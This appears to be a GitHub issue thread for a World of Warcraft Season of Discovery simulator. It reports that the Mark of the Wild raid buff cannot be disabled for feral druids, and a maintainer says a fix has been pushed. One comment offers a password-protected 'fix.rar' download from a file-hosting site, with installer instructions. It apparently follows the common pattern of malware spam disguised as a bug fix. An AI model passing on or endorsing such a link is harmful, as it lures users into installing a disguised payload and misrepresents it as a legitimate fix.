### ISSUE TITLE
motw cant be turned off

### ISSUE THREAD

**Issue by noimlazy** [wowsims/sod#995]
**Describe the bug**
When MotW is unselected, buff is still applied.

**To Reproduce**
1. Go to Feral dps druid
2. Click on settings
3. Scroll down to raid buffs
4. grey out MotW- no change in fire res

**Expected behavior**
when greyed out fire res should be reduced by 20

**Sim Links and Screenshots**
https://wowsims.github.io/sod/feral_druid/#eJzjYnBiEGKQ+sfGxRaQk1iZWiTAImGjwKi1mJGLW+DFa16JK+YaP3dJcjELbK3nYhd4+YpXotuai0vgZYpEj7XGtZdSQGWvgcoe82ms/CwB5DwBcu7yafxfLgkyAKh8PrvGbqAMh8CTV7waX3eBhF8BhR9ya2wBa3gF1HCfT2MaUIZD4MJ7Xo1v16WBrP8feDU2tMhwsQic/sILJL985QXa//Mzr8QbPi4GoMC+3bxGQgLsGkwWTA5MFeyXGJkkGG8wslmdY+F6wMQwCmgKhF4wDrQT6AVeMTE48VkwrmBkdGAMYJzByJjA6CVragAEpsYGhrqmIKaRgbGRsZGBkaGpoa6haQBXBEcSQxYwPRacYPzBxHgSmhw5HC5CWZYON5gYZzEyrGJkk2IRSFFgVDrAzAmRinMQhDD0HCRnzQSBk/aWEJEL9oppYHDN3mgCM8eNJl4hDp/UstQcBTMDCXutQZbqNTodqGKO2lqKzBGQ+k8ddwCBIZgsWO5gmZn/ofVkyFV7R6iMQwQjALuSdLU=

**Desktop (please complete the following information):**
 - Browser chrome

.

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kayla-glick** [comment]
Pushed up a fix to allow MoTW to be disabled by druids!
